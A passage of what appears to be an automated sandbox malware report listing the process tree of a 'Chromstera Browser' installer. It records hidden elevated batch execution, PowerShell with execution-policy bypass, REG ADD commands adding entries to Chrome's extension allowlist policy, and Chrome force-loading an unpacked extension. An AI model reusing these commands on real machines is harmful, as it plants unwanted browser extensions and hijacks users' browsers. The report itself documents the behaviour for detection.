                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:14:11:27
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:14:11:28
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe"
                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                            File size:1'204'192 bytes
                                                                                                                                                                            MD5 hash:427C459E138B4F33819558D451E8500E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:14:11:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:14:11:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:14
                                                                                                                                                                            Start time:14:11:44
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:15
                                                                                                                                                                            Start time:14:11:44
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:16
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\Installer\MSI4739.tmp
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"
                                                                                                                                                                            Imagebase:0x7ff77c090000
                                                                                                                                                                            File size:570'176 bytes
                                                                                                                                                                            MD5 hash:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                                                                                                                                                                            Imagebase:0x7ff65c650000
                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:22
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:23
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:24
                                                                                                                                                                            Start time:14:11:58
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:14:11:58
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:14:11:58
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:14:11:58
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:14:11:58
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:14:12:00
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:14:12:02
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:14:12:04
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:32
                                                                                                                                                                            Start time:14:12:06
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:33
                                                                                                                                                                            Start time:14:12:08
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:14:12:10
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:35
                                                                                                                                                                            Start time:14:12:11
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:14:12:11
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:37
                                                                                                                                                                            Start time:14:12:12
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:38
                                                                                                                                                                            Start time:14:12:14
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:39
                                                                                                                                                                            Start time:14:12:16
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:40
                                                                                                                                                                            Start time:14:12:18
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:41
                                                                                                                                                                            Start time:14:12:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:42
                                                                                                                                                                            Start time:14:12:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:43
                                                                                                                                                                            Start time:14:12:20
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:44
                                                                                                                                                                            Start time:14:12:22
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:45
                                                                                                                                                                            Start time:14:12:24
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:46
                                                                                                                                                                            Start time:14:12:26
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:47
                                                                                                                                                                            Start time:14:12:28
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:48
                                                                                                                                                                            Start time:14:12:30
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:49
                                                                                                                                                                            Start time:14:12:32
